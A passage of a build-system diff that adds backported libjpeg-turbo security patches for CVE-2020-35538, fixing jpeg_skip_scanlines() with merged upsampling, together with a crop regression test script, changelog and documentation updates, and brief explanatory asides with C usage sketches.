+ cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+ increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+ }
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ return num_lines;
+ }
+
+@@ -535,7 +585,13 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+ * output_scanline.
+ */
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+
+ /* Always skip the requested number of lines. */
+ return num_lines;
+diff --git a/jdmerge.c b/jdmerge.c
+index dff5a35..833ad67 100644
+--- a/jdmerge.c
++++ b/jdmerge.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+ * Copyright 2009 Pierre Ossman <ossman@cendio.se> for Cendio AB
+- * Copyright (C) 2009, 2011, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2011, 2014-2015, 2020, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -40,41 +40,13 @@
+ #define JPEG_INTERNALS
+ #include "jinclude.h"
+ #include "jpeglib.h"
++#include "jdmerge.h"
+ #include "jsimd.h"
+ #include "jconfigint.h"
+
+ #ifdef UPSAMPLE_MERGING_SUPPORTED
+
+
+-/* Private subobject */
+-
+-typedef struct {
+- struct jpeg_upsampler pub; /* public fields */
+-
+- /* Pointer to routine to do actual upsampling/conversion of one row group */
+- void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
+-
+- /* Private state for YCC->RGB conversion */
+- int *Cr_r_tab; /* => table for Cr to R conversion */
+- int *Cb_b_tab; /* => table for Cb to B conversion */
+- JLONG *Cr_g_tab; /* => table for Cr to G conversion */
+- JLONG *Cb_g_tab; /* => table for Cb to G conversion */
+-
+- /* For 2:1 vertical sampling, we produce two output rows at a time.
+- * We need a "spare" row buffer to hold the second output row if the
+- * application provides just a one-row buffer; we also use the spare
+- * to discard the dummy last row if the image height is odd.
+- */
+- JSAMPROW spare_row;
+- boolean spare_full; /* T if spare buffer is occupied */
+-
+- JDIMENSION out_row_width; /* samples per output row */
+- JDIMENSION rows_to_go; /* counts rows remaining in image */
+-} my_upsampler;
+-
+-typedef my_upsampler *my_upsample_ptr;
+-
+ #define SCALEBITS 16 /* speediest right-shift on some machines */
+ #define ONE_HALF ((JLONG)1 << (SCALEBITS - 1))
+ #define FIX(x) ((JLONG)((x) * (1L << SCALEBITS) + 0.5))
+@@ -189,7 +161,7 @@ typedef my_upsampler *my_upsample_ptr;
+ LOCAL(void)
+ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ int i;
+ JLONG x;
+ SHIFT_TEMPS
+@@ -232,7 +204,7 @@ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ METHODDEF(void)
+ start_pass_merged_upsample(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+
+ /* Mark the spare buffer empty */
+ upsample->spare_full = FALSE;
+@@ -254,7 +226,7 @@ merged_2v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 2:1 vertical sampling case: may need a spare row. */
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ JSAMPROW work_ptrs[2];
+ JDIMENSION num_rows; /* number of rows returned to caller */
+
+@@ -305,7 +277,7 @@ merged_1v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 1:1 vertical sampling case: much easier, never need a spare row. */
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+
+ /* Just do the upsampling. */
+ (*upsample->upmethod) (cinfo, input_buf, *in_row_group_ctr,
+@@ -566,11 +538,11 @@ h2v2_merged_upsample_565D(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ GLOBAL(void)
+ jinit_merged_upsampler(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample;
++ my_merged_upsample_ptr upsample;
+
+- upsample = (my_upsample_ptr)
++ upsample = (my_merged_upsample_ptr)
+ (*cinfo->mem->alloc_small) ((j_common_ptr)cinfo, JPOOL_IMAGE,
+- sizeof(my_upsampler));
++ sizeof(my_merged_upsampler));
+ cinfo->upsample = (struct jpeg_upsampler *)upsample;
+ upsample->pub.start_pass = start_pass_merged_upsample;
+ upsample->pub.need_context_rows = FALSE;
+diff --git a/jdmerge.h b/jdmerge.h
+new file mode 100644
+index 0000000..b583396
+--- /dev/null
++++ b/jdmerge.h
+@@ -0,0 +1,47 @@
++/*
++ * jdmerge.h
++ *
++ * This file was part of the Independent JPEG Group's software:
++ * Copyright (C) 1994-1996, Thomas G. Lane.
++ * libjpeg-turbo Modifications:
++ * Copyright (C) 2020, D. R. Commander.
++ * For conditions of distribution and use, see the accompanying README.ijg
++ * file.
++ */
++
++#define JPEG_INTERNALS
++#include "jpeglib.h"
++
++#ifdef UPSAMPLE_MERGING_SUPPORTED
++
++
++/* Private subobject */
++
++typedef struct {
++ struct jpeg_upsampler pub; /* public fields */
++
++ /* Pointer to routine to do actual upsampling/conversion of one row group */
++ void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
++
++ /* Private state for YCC->RGB conversion */
++ int *Cr_r_tab; /* => table for Cr to R conversion */
++ int *Cb_b_tab; /* => table for Cb to B conversion */
++ JLONG *Cr_g_tab; /* => table for Cr to G conversion */
++ JLONG *Cb_g_tab; /* => table for Cb to G conversion */
++
++ /* For 2:1 vertical sampling, we produce two output rows at a time.
++ * We need a "spare" row buffer to hold the second output row if the
++ * application provides just a one-row buffer; we also use the spare
++ * to discard the dummy last row if the image height is odd.
++ */
++ JSAMPROW spare_row;
++ boolean spare_full; /* T if spare buffer is occupied */
++
++ JDIMENSION out_row_width; /* samples per output row */
++ JDIMENSION rows_to_go; /* counts rows remaining in image */
++} my_merged_upsampler;
++
++typedef my_merged_upsampler *my_merged_upsample_ptr;
++
++#endif /* UPSAMPLE_MERGING_SUPPORTED */
+diff --git a/jdmrg565.c b/jdmrg565.c
+index 1b87e37..53f1e16 100644
+--- a/jdmrg565.c
++++ b/jdmrg565.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+ * Copyright (C) 2013, Linaro Limited.
+- * Copyright (C) 2014-2015, 2018, D. R. Commander.
++ * Copyright (C) 2014-2015, 2018, 2020, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -19,7 +19,7 @@ h2v1_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -90,7 +90,7 @@ h2v1_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -163,7 +163,7 @@ h2v2_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+@@ -259,7 +259,7 @@ h2v2_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+diff --git a/jdmrgext.c b/jdmrgext.c
+index b1c27df..c9a44d8 100644
+--- a/jdmrgext.c
++++ b/jdmrgext.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2011, 2015, D. R. Commander.
++ * Copyright (C) 2011, 2015, 2020, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -25,7 +25,7 @@ h2v1_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -97,7 +97,7 @@ h2v2_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+--
+2.25.1
+
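For context, the code path this patch hardens is reached from ordinary application code like the sketch below: merged (non-fancy) upsampling combined with jpeg_skip_scanlines(). This is a minimal, error-handling-free sketch; the function name and the caller-supplied row buffer are assumptions, not part of the patch.

    #include <stdio.h>
    #include <jpeglib.h>

    /* Decode a JPEG with merged upsampling, skipping the first rows. */
    void skip_then_read (FILE *fp, JDIMENSION skip, JSAMPARRAY rows)
    {
      struct jpeg_decompress_struct cinfo;
      struct jpeg_error_mgr jerr;

      cinfo.err = jpeg_std_error (&jerr);
      jpeg_create_decompress (&cinfo);
      jpeg_stdio_src (&cinfo, fp);
      jpeg_read_header (&cinfo, TRUE);

      cinfo.do_fancy_upsampling = FALSE;    /* selects the merged upsamplers */
      jpeg_start_decompress (&cinfo);

      jpeg_skip_scanlines (&cinfo, skip);   /* the path this CVE fix touches */
      while (cinfo.output_scanline < cinfo.output_height)
        jpeg_read_scanlines (&cinfo, rows, 1);

      jpeg_finish_decompress (&cinfo);
      jpeg_destroy_decompress (&cinfo);
    }

Before the fix, the jpeg_skip_scanlines() call above could clobber an IDCT method pointer because it cast cinfo->upsample to the non-merged private structure.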
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
new file mode 100644
index 0000000000..f86175dff0
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
@@ -0,0 +1,400 @@
+From a46c111d9f3642f0ef3819e7298846ccc61869e0 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Mon, 27 Jul 2020 14:21:23 -0500
+Subject: [PATCH] Further jpeg_skip_scanlines() fixes
+
+- Introduce a partial image decompression regression test script that
+ validates the correctness of jpeg_skip_scanlines() and
+ jpeg_crop_scanlines() for a variety of cropping regions and libjpeg
+ settings.
+
+ This regression test catches the following issues:
+ #182, fixed in 5bc43c7
+ #237, fixed in 6e95c08
+ #244, fixed in 398c1e9
+ #441, fully fixed in this commit
+
+ It does not catch the following issues:
+ #194, fixed in 773040f
+ #244 (additional segfault), fixed in
+ 9120a24
+
+- Modify the libjpeg-turbo regression test suite (make test) so that it
+ checks for the issue reported in #441 (segfault in
+ jpeg_skip_scanlines() when used with 4:2:0 merged upsampling/color
+ conversion.)
+
+- Fix issues in jpeg_skip_scanlines() that caused incorrect output with
+ h2v2 (4:2:0) merged upsampling/color conversion. The previous commit
+ fixed the segfault reported in #441, but that was a symptom of a
+ larger problem. Because merged 4:2:0 upsampling uses a "spare row"
+ buffer, it is necessary to allow the upsampler to run when skipping
+ rows (fancy 4:2:0 upsampling, which uses context rows, also requires
+ this.) Otherwise, if skipping starts at an odd-numbered row, the
+ output image will be incorrect.
+
+- Throw an error if jpeg_skip_scanlines() is called with two-pass color
+ quantization enabled. With two-pass color quantization, the first
+ pass occurs within jpeg_start_decompress(), so subsequent calls to
+ jpeg_skip_scanlines() interfere with the multipass state and prevent
+ the second pass from occurring during subsequent calls to
+ jpeg_read_scanlines().
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/a46c111d9f3642f0ef3819e7298846ccc61869e0]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ CMakeLists.txt | 9 +++--
+ ChangeLog.md | 15 +++++---
+ croptest.in | 95 ++++++++++++++++++++++++++++++++++++++++++++++++++
+ jdapistd.c | 70 +++++++++++--------------------------
+ libjpeg.txt | 6 ++--
+ 5 files changed, 136 insertions(+), 59 deletions(-)
+ create mode 100755 croptest.in
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index aee74c9..de451f4 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -753,7 +753,7 @@ else()
+ set(MD5_PPM_3x2_IFAST fd283664b3b49127984af0a7f118fccd)
+ set(MD5_JPEG_420_ISLOW_ARI e986fb0a637a8d833d96e8a6d6d84ea1)
+ set(MD5_JPEG_444_ISLOW_PROGARI 0a8f1c8f66e113c3cf635df0a475a617)
+- set(MD5_PPM_420M_IFAST_ARI 72b59a99bcf1de24c5b27d151bde2437)
++ set(MD5_PPM_420M_IFAST_ARI 57251da28a35b46eecb7177d82d10e0e)
+ set(MD5_JPEG_420_ISLOW 9a68f56bc76e466aa7e52f415d0f4a5f)
+ set(MD5_PPM_420M_ISLOW_2_1 9f9de8c0612f8d06869b960b05abf9c9)
+ set(MD5_PPM_420M_ISLOW_15_8 b6875bc070720b899566cc06459b63b7)
+@@ -1131,7 +1131,7 @@ foreach(libtype ${TEST_LIBTYPES})
+
+ if(WITH_ARITH_DEC)
+ # CC: RGB->YCC SAMP: h2v2 merged IDCT: ifast ENT: arith
+- add_bittest(djpeg 420m-ifast-ari "-fast;-ppm"
++ add_bittest(djpeg 420m-ifast-ari "-fast;-skip;1,20;-ppm"
+ testout_420m_ifast_ari.ppm ${TESTIMAGES}/testimgari.jpg
+ ${MD5_PPM_420M_IFAST_ARI})
+
+@@ -1266,6 +1266,11 @@ endforeach()
+ add_custom_target(testclean COMMAND ${CMAKE_COMMAND} -P
+ ${CMAKE_CURRENT_SOURCE_DIR}/cmakescripts/testclean.cmake)
+
++configure_file(croptest.in croptest @ONLY)
++add_custom_target(croptest
++ COMMAND echo croptest
++ COMMAND ${BASH} ${CMAKE_CURRENT_BINARY_DIR}/croptest)
++
+ if(WITH_TURBOJPEG)
+ configure_file(tjbenchtest.in tjbenchtest @ONLY)
+ configure_file(tjexampletest.in tjexampletest @ONLY)
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 19d18fa..4562eff 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,11 +54,16 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+
+-2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
+-in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
+-images using the merged (non-fancy) upsampling algorithms (that is, when
+-setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
+-but it did not cover all cases.
++2. Fixed or worked around multiple issues with `jpeg_skip_scanlines()`:
++
++ - Fixed segfaults or "Corrupt JPEG data: premature end of data segment"
++errors in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or
++4:2:0 JPEG images using merged (non-fancy) upsampling/color conversion (that
++is, when setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a
++similar fix, but it did not cover all cases.
++ - `jpeg_skip_scanlines()` now throws an error if two-pass color
++quantization is enabled. Two-pass color quantization never worked properly
++with `jpeg_skip_scanlines()`, and the issues could not readily be fixed.
+
+
+ 2.0.3
+diff --git a/croptest.in b/croptest.in
+new file mode 100755
+index 0000000..7e3c293
+--- /dev/null
++++ b/croptest.in
+@@ -0,0 +1,95 @@
++#!/bin/bash
++
++set -u
++set -e
++trap onexit INT
++trap onexit TERM
++trap onexit EXIT
++
++onexit()
++{
++ if [ -d $OUTDIR ]; then
++ rm -rf $OUTDIR
++ fi
++}
++
++runme()
++{
++ echo \*\*\* $*
++ $*
++}
++
++IMAGE=vgl_6548_0026a.bmp
++WIDTH=128
++HEIGHT=95
++IMGDIR=@CMAKE_CURRENT_SOURCE_DIR@/testimages
++OUTDIR=`mktemp -d /tmp/__croptest_output.XXXXXX`
++EXEDIR=@CMAKE_CURRENT_BINARY_DIR@
++
++if [ -d $OUTDIR ]; then
++ rm -rf $OUTDIR
++fi
++mkdir -p $OUTDIR
++
++exec >$EXEDIR/croptest.log
++
++echo "============================================================"
++echo "$IMAGE ($WIDTH x $HEIGHT)"
++echo "============================================================"
++echo
++
++for PROGARG in "" -progressive; do
++
++ cp $IMGDIR/$IMAGE $OUTDIR
++ basename=`basename $IMAGE .bmp`
++ echo "------------------------------------------------------------"
++ echo "Generating test images"
++ echo "------------------------------------------------------------"
++ echo
++ runme $EXEDIR/cjpeg $PROGARG -grayscale -outfile $OUTDIR/${basename}_GRAY.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 2x2 -outfile $OUTDIR/${basename}_420.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 2x1 -outfile $OUTDIR/${basename}_422.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 1x2 -outfile $OUTDIR/${basename}_440.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 1x1 -outfile $OUTDIR/${basename}_444.jpg $IMGDIR/${basename}.bmp
++ echo
++
++ for NSARG in "" -nosmooth; do
++
++ for COLORSARG in "" "-colors 256 -dither none -onepass"; do
++
++ for Y in {0..16}; do
++
++ for H in {1..16}; do
++
++ X=$(( (Y*16)%128 ))
++ W=$(( WIDTH-X-7 ))
++ if [ $Y -le 15 ]; then
++ CROPSPEC="${W}x${H}+${X}+${Y}"
++ else
++ Y2=$(( HEIGHT-H ));
++ CROPSPEC="${W}x${H}+${X}+${Y2}"
++ fi
++
++ echo "------------------------------------------------------------"
++ echo $PROGARG $NSARG $COLORSARG -crop $CROPSPEC
++ echo "------------------------------------------------------------"
++ echo
++ for samp in GRAY 420 422 440 444; do
++ $EXEDIR/djpeg $NSARG $COLORSARG -rgb -outfile $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}.jpg
++ convert -crop $CROPSPEC $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++ runme $EXEDIR/djpeg $NSARG $COLORSARG -crop $CROPSPEC -rgb -outfile $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}.jpg
++ runme cmp $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++ done
++ echo
++
++ done
++
++ done
++
++ done
++
++ done
++
++done
++
++echo SUCCESS!
+diff --git a/jdapistd.c b/jdapistd.c
+index 91da642..c502909 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -306,16 +306,6 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+
+
+-/* Dummy postprocessing function used by jpeg_skip_scanlines() */
+-LOCAL(void)
+-noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION *in_row_group_ctr,
+- JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
+- JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+-{
+-}
+-
+-
+ /*
+ * In some cases, it is best to call jpeg_read_scanlines() and discard the
+ * output, rather than skipping the scanlines, because this allows us to
+@@ -329,16 +319,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ JDIMENSION n;
+ my_master_ptr master = (my_master_ptr)cinfo->master;
++ JSAMPARRAY scanlines = NULL;
+ void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION input_row, JSAMPARRAY output_buf,
+ int num_rows) = NULL;
+ void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ JSAMPARRAY output_buf, int num_rows) = NULL;
+- void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION *in_row_group_ctr,
+- JDIMENSION in_row_groups_avail,
+- JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
+- JDIMENSION out_rows_avail) = NULL;
+
+ if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+ color_convert = cinfo->cconvert->color_convert;
+@@ -350,23 +336,19 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->cquantize->color_quantize = noop_quantize;
+ }
+
+- if (master->using_merged_upsample && cinfo->post &&
+- cinfo->post->post_process_data) {
+- post_process_data = cinfo->post->post_process_data;
+- cinfo->post->post_process_data = noop_post_process;
++ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ scanlines = &upsample->spare_row;
+ }
+
+ for (n = 0; n < num_lines; n++)
+- jpeg_read_scanlines(cinfo, NULL, 1);
++ jpeg_read_scanlines(cinfo, scanlines, 1);
+
+ if (color_convert)
+ cinfo->cconvert->color_convert = color_convert;
+
+ if (color_quantize)
+ cinfo->cquantize->color_quantize = color_quantize;
+-
+- if (post_process_data)
+- cinfo->post->post_process_data = post_process_data;
+ }
+
+
+@@ -380,6 +362,12 @@ increment_simple_rowgroup_ctr(j_decompress_ptr cinfo, JDIMENSION rows)
+ {
+ JDIMENSION rows_left;
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
++
++ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++ read_and_discard_scanlines(cinfo, rows);
++ return;
++ }
+
+ /* Increment the counter to the next row group after the skipped rows. */
+ main_ptr->rowgroup_ctr += rows / cinfo->max_v_samp_factor;
+@@ -410,11 +398,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+ my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+ my_master_ptr master = (my_master_ptr)cinfo->master;
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+ JDIMENSION i, x;
+ int y;
+ JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+ JDIMENSION lines_to_skip, lines_to_read;
+
++ /* Two-pass color quantization is not supported. */
++ if (cinfo->quantize_colors && cinfo->two_pass_quantize)
++ ERREXIT(cinfo, JERR_NOTIMPL);
++
+ if (cinfo->global_state != DSTATE_SCANNING)
+ ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);
+
+@@ -472,13 +465,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+ main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->spare_full = FALSE;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample) {
+ upsample->next_row_out = cinfo->max_v_samp_factor;
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+ }
+@@ -493,13 +480,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_scanline += lines_left_in_iMCU_row;
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->spare_full = FALSE;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample) {
+ upsample->next_row_out = cinfo->max_v_samp_factor;
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+ }
+@@ -537,14 +518,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+ increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+ }
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample)
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- }
+ return num_lines;
+ }
+
+@@ -585,13 +560,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+ * output_scanline.
+ */
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample)
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- }
+
+ /* Always skip the requested number of lines. */
+ return num_lines;
+diff --git a/libjpeg.txt b/libjpeg.txt
+index c50cf90..c233ecb 100644
+--- a/libjpeg.txt
++++ b/libjpeg.txt
+@@ -3,7 +3,7 @@ USING THE IJG JPEG LIBRARY
+ This file was part of the Independent JPEG Group's software:
+ Copyright (C) 1994-2013, Thomas G. Lane, Guido Vollbeding.
+ libjpeg-turbo Modifications:
+-Copyright (C) 2010, 2014-2018, D. R. Commander.
++Copyright (C) 2010, 2014-2018, 2020, D. R. Commander.
+ Copyright (C) 2015, Google, Inc.
+ For conditions of distribution and use, see the accompanying README.ijg file.
+
+@@ -750,7 +750,9 @@ multiple rows in the JPEG image.
+
+ Suspending data sources are not supported by this function. Calling
+ jpeg_skip_scanlines() with a suspending data source will result in undefined
+-behavior.
++behavior. Two-pass color quantization is also not supported by this function.
++Calling jpeg_skip_scanlines() with two-pass color quantization enabled will
++result in an error.
+
+ jpeg_skip_scanlines() will not allow skipping past the bottom of the image. If
+ the value of num_lines is large enough to skip past the bottom of the image,
+--
+2.25.1
+
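One behavioural change introduced above: jpeg_skip_scanlines() now raises an error (JERR_NOTIMPL) when two-pass color quantization is enabled. A hedged sketch of the guard an application might add, assuming it keeps a scratch row buffer around for the fallback path:

    #include <jpeglib.h>

    /* Skip n rows, falling back to read-and-discard when two-pass
     * color quantization is active (names are placeholders). */
    void skip_rows (j_decompress_ptr cinfo, JDIMENSION n, JSAMPARRAY scratch)
    {
      if (cinfo->quantize_colors && cinfo->two_pass_quantize)
      {
        /* jpeg_skip_scanlines() would error out here; discard rows instead. */
        for (JDIMENSION i = 0; i < n; i++)
          jpeg_read_scanlines (cinfo, scratch, 1);
      }
      else
        jpeg_skip_scanlines (cinfo, n);
    }

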